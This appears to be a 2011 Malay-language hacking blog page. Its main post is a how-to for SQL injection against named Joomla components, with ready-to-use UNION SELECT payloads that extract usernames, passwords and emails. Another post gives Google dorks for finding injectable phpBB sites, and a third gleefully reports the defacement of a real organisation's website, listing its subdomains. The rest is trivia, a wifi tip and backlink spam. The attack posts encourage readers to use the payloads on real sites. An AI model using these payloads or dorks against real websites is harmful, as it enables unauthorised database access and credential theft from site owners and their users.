Sunday, 18 December 2011

Macam mana Nak Hack Joomla - Mari Hack Joomla lulz..


Macam mana nak hack joomla.
Bagaimana nak hack joomla..

Jom hari ni kita hack joomla. jom jom..

Korang akan nampak lebih kurang cam ni

index.php?option=com_blabla&category=5&Item=2

Parameters cam ni..

- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

Contoh.. category=5 to category='

Tekan enter dan tengok MySQL error yg ada dalam site Joomla

Untuk menunjukkan dengan lebih jelas lagi.. kat sini I bagi beberapa contoh yang i dah jumpe..

URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Camne? jadi korang kena lebih explore.. kena perah otak lagi.. xD~

Memandangkan Joomla mempunyai Struktur database yang sama.. Di sini I bagi contoh lg..

Contoh #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--

Contoh #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--

Contoh #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--

SQL Injection dengan Joomla mmg menarik bila dah tahu.. Korang boleh cari seberapa banyak informasi database yang ada dalam Joomla..

Ketemu lagi ya.. 

Thursday, 8 December 2011

"mypage.php?id=" - Google Dork Baru Untuk SQLi phpBB - yeaa


Terbaru dari pasaran.. Ini adalah google dork yg di update dari Exploit-DB.com. Update pada 6/12/2011. Oleh kerana itu.. ia amat baru.. Jadi korang boleh apply dork ni.. Buat la sampai lebam..

"mypage.php?id="


inurl:mypage.php?id=


etc.... creative kan diri anda.. 


SQLi Dork hacking data base


SQL Injection untuk Forum phpBB







Tuesday, 6 December 2011

Cara Kuatkan Signal Wifi di Rumah Anda - Simple & Berkesan


Bagaimana nak kuatkan signal wifi di rumah?
Macam mana nak kuatkan signal wifi?
Di Pejabat pun boleh..
xD~

ahaks.. cara simple ni I share untuk semua yg ada wifi di rumah atau pejabat.. atau di kedai sendiri.. kedai org lain tak payah la.. tapi kalau nak syorkan teknik ni kt owner lain.. mungkin anda boleh kenakan bayaran.. oww.. bisnes minded.. eheks~
Tgk pic kat bawah tu..


Monday, 5 December 2011

3 Perkara Mustahil Dalam Dunia - WOW!!!


Ya!! ada 3 PERKARA MUSTAHIL DALAM DUNIA!!

-Anda tidak boleh mengira rambut anda
-Anda tidak boleh membasuh kedua mata dengan sabun
-Anda tidak boleh bernafas jika lidah anda berada di luar

Thursday, 1 December 2011

Website Pekida Kena Hack


Hehe.. I melaporkan dari blog H 4 c K bahawasanya Website Pekida kena hack oleh Jamaycka. Nampaknya senang2 je website Pekida ni kena hack dengan mamat ni ye.. Pada pendapat I, mesti ramai dh dia punye members.. dan mereka tentu bengang banget bila kena hack macam ni. huhu.. sorry, I cuma reporter yang takde sangkut paut dalam ini hack ye.. ehek.. Think Positive

Hmmm .. Masa i nak amik screen shot dia, nampaknya Homepage mereka telah dibaik pulih.. Walaubagaimanapun.. forumnya masih belum dibaik pulih dan I berkesempatan untuk mengambil video untuk forum pekida yang telah di hack juga..





Forum Pekida


Antara subdomain yang dinotify oleh Pengodam pagi ini adalah:

http://putrajaya.pekida.com.my/cgi-sys/suspendedpage.cgi
http://galeri.pekida.com.my/cgi-sys/suspendedpage.cgi
http://sms.pekida.com.my/cgi-sys/suspendedpage.cgi
http://bicara.pekida.com.my/cgi-sys/suspendedpage.cgi
http://brotherhood.pekida.com.my/cgi-sys/suspendedpage.cgi
http://email.pekida.com.my/cgi-sys/suspendedpage.cgi
http://forum.pekida.com.my/cgi-sys/suspendedpage.cgi

Laman Web Pekida Kena Hack
Website Pekida Kena Hack
Pekida Kena Hack
Website Pekida Kena Godam
Pekida Kena Godam


Credit: KenaHack

Monday, 28 November 2011

Macam Mana Nak Dapatkan Backlink Yang Beribu-Ribu - Nah! Amik 2000++ Backlinks


Susah sangat ke nak dapatkan backlink? Senang je.. Post ni khas untuk blogger.. ehek.. hacker yg ada blog pun leh kalau nak tau..

Backlinks penting utk blog kalau korang nak naikkan blog korang.. Jadi, apa yang I bg ni adalah bagus untuk korang.. google suka link juice.. 2000++ backlinks memang terbaik utk korang dan google bot akan crawl blog korang selalu..  hanya dengan klik dapatkan Superb Backlinks.. Pandai-pandai la bila I dah bagi link ni..


macam mana nak dapatkan backlink
bagaimana nak dapat backlink
Backlink? kikikik..